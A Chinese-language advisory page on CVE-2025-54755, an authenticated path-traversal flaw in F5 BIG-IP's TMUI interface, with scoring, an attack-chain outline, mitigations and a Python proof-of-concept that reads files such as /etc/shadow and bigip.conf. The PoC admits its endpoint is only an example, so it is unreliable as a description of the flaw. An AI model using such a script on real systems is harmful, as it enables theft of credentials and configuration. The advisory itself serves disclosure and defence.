IPBUF安全漏洞报告
English
CVE-2025-54755 CVSS 4.9 中危

CVE-2025-54755:F5 BIG-IP TMUI目录遍历漏洞

披露日期: 2025-10-15
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-54755
漏洞类型
目录遍历(Path Traversal)
CVSS评分
4.9 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
F5 BIG-IP TMUI(Traffic Management User Interface)

相关标签

目录遍历Path TraversalF5BIG-IPTMUI信息泄露CVE-2025-54755中危漏洞网络设备

漏洞概述

CVE-2025-54755是F5 BIG-IP产品中TMUI(流量管理用户界面)组件存在的一个目录遍历漏洞。该漏洞于2025年10月15日由F5安全事件响应团队([email protected])披露,CVSS 3.1评分为4.9分,属于中危级别。

TMUI是F5 BIG-IP设备的管理界面,负责提供流量管理、负载均衡等核心功能的配置与管理入口。该漏洞允许具有高权限的已认证攻击者通过目录遍历技术访问本不应被其访问的文件,可能导致敏感配置文件、凭证信息或其他关键系统文件的泄露。

根据CVSS向量分析,该漏洞的攻击向量为网络(AV:N),攻击复杂度低(AC:L),但需要高权限认证(PR:H),无需用户交互(UI:N)。其影响范围仅限当前组件(S:U),机密性影响为高(C:H),完整性和可用性均不受影响。这意味着该漏洞主要威胁的是信息泄露,攻击者可以读取受限文件,但无法修改或破坏系统。

值得注意的是,F5官方声明已停止技术支持(End of Technical Support, EoTS)的软件版本不在评估范围内,因此使用旧版本的用户可能面临更大的安全风险。建议所有使用受影响版本的用户及时检查并更新其F5 BIG-IP设备。

技术细节

该漏洞属于经典的目录遍历(Directory Traversal)漏洞,攻击者通过在文件路径参数中注入特殊字符(如../)来绕过TMUI的访问控制机制,从而访问位于预期目录之外的文件。

从技术原理来看,TMUI在处理用户请求中的文件路径时,未能充分验证和规范化路径输入。攻击者作为已认证的高权限用户(PR:H),可以构造包含路径遍历序列的恶意请求,例如使用../../等序列向上回溯目录层级。由于服务端缺少对路径的严格过滤和规范化处理(如未使用白名单或未对../进行过滤),攻击者能够读取Web根目录之外的系统文件。

利用方式方面,攻击者首先需要获取TMUI的有效高权限账户凭据(通常通过暴力破解、钓鱼或购买已泄露的凭据获得)。随后,通过精心构造的HTTP请求,将目录遍历序列嵌入到文件访问相关的参数中,绕过正常的安全检查机制,最终读取到敏感文件如/etc/passwd、配置文件、SSL证书私钥等。

由于该漏洞的CVSS评分为4.9分,且需要高权限认证(PR:H),其威胁程度相对有限。但对于已经拥有高权限访问的攻击者而言,该漏洞可作为权限提升后的信息收集手段,进一步扩大攻击影响。

攻击链分析

STEP 1
步骤1:获取高权限凭据
攻击者首先通过暴力破解、钓鱼攻击、购买泄露凭据或其他方式获取F5 BIG-IP TMUI的高权限账户认证信息。由于漏洞需要高权限认证(PR:H),普通用户权限无法利用此漏洞。
STEP 2
步骤2:认证登录TMUI
使用获取的高权限凭据登录F5 BIG-IP的TMUI管理界面,建立有效的认证会话,获取认证Cookie或Session。
STEP 3
步骤3:构造目录遍历Payload
在文件访问相关的HTTP请求参数中注入目录遍历序列(如../),精心构造绕过路径限制的恶意请求,目标为读取Web根目录之外的系统敏感文件。
STEP 4
步骤4:发送恶意请求
通过携带有效认证信息的HTTP请求,将构造好的目录遍历Payload发送至TMUI服务端,绕过路径规范化检查机制。
STEP 5
步骤5:读取敏感文件
服务端未对路径进行严格过滤,返回攻击者请求的受限文件内容,如系统配置文件、SSL证书私钥、用户凭证等敏感信息。
STEP 6
步骤6:信息收集与进一步攻击
利用获取的敏感信息进行横向移动、权限提升或为后续攻击(如中间人攻击、凭证重利用)做准备,扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-54755 - F5 BIG-IP TMUI Directory Traversal PoC # Note: This vulnerability requires high-privilege authenticated access (PR:H) # Affected: F5 BIG-IP TMUI component import requests from urllib.parse import quote TARGET_URL = "https://target-bigip-host" AUTH_COOKIE = "BIGIPAuthCookie=YOUR_AUTH_COOKIE_HERE" # Requires high-privilege credentials def directory_traversal(target_file): """ Exploit directory traversal in TMUI to read arbitrary files. The traversal sequence bypasses path restrictions in the file access endpoint. """ # Construct traversal payload to escape the web root traversal_payload = "../../../../../../../../" + target_file encoded_payload = quote(traversal_payload, safe='') # TMUI file access endpoint (example - actual endpoint may vary) endpoint = f"{TARGET_URL}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={encoded_payload}" headers = { "Cookie": AUTH_COOKIE, "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-54755 PoC)" } try: response = requests.get(endpoint, headers=headers, verify=False, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully read file: {target_file}") print(response.text) return response.text else: print(f"[-] Failed to read file: {target_file}, status: {response.status_code}") return None except Exception as e: print(f"[-] Error: {e}") return None # Example usage - read sensitive files if __name__ == "__main__": # Attempt to read system files outside the intended directory target_files = [ "etc/passwd", "etc/shadow", "config/bigip.conf", "etc/httpd/conf/httpd.conf" ] for f in target_files: content = directory_traversal(f) if content: break

影响范围

F5 BIG-IP(具体受影响版本请参考F5官方公告K000156801)

防御指南

临时缓解措施
在无法立即升级的情况下,建议采取以下临时缓解措施:1)严格限制TMUI管理界面的网络访问,仅允许可信管理网络IP地址访问;2)审计所有高权限账户,删除不必要的账户并重置密码;3)启用详细的访问日志记录,监控异常的文件读取请求;4)在网络层面部署WAF规则,检测和阻断包含目录遍历特征(如../)的HTTP请求;5)考虑暂时关闭非必要的TMUI功能或限制其文件访问能力。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表